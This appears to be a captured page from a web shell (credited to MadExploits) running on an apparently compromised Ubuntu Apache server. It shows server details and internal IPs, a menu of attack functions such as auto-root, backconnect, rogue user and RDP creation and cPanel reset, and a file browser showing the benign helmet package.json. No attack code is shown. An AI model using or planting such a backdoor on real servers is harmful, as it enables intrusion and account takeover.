Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
server /
node_modules /
helmet /
[ HOME SHELL ]
Name
Size
Permission
Action
CHANGELOG.md
24.86
KB
-rw-r--r--
LICENSE
1.06
KB
-rw-r--r--
README.md
19.73
KB
-rw-r--r--
SECURITY.md
382
B
-rw-r--r--
index.cjs
20.12
KB
-rw-r--r--
index.d.cts
7.25
KB
-rw-r--r--
index.d.mts
7.25
KB
-rw-r--r--
index.mjs
19.49
KB
-rw-r--r--
package.json
1.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "helmet", "description": "help secure Express/Connect apps with various HTTP headers", "version": "8.1.0", "author": "Adam Baldwin <adam@npmjs.com> (https://evilpacket.net)", "contributors": [ "Evan Hahn <me@evanhahn.com> (https://evanhahn.com)" ], "homepage": "https://helmetjs.github.io/", "bugs": { "url": "https://github.com/helmetjs/helmet/issues", "email": "me@evanhahn.com" }, "repository": { "type": "git", "url": "git://github.com/helmetjs/helmet.git" }, "license": "MIT", "keywords": [ "express", "security", "headers", "backend", "content-security-policy", "cross-origin-embedder-policy", "cross-origin-opener-policy", "cross-origin-resource-policy", "origin-agent-cluster", "referrer-policy", "strict-transport-security", "x-content-type-options", "x-dns-prefetch-control", "x-download-options", "x-frame-options", "x-permitted-cross-domain-policies", "x-powered-by", "x-xss-protection" ], "engines": { "node": ">=18.0.0" }, "exports": { "import": "./index.mjs", "require": "./index.cjs" }, "main": "./index.cjs", "types": "./index.d.cts" }
Close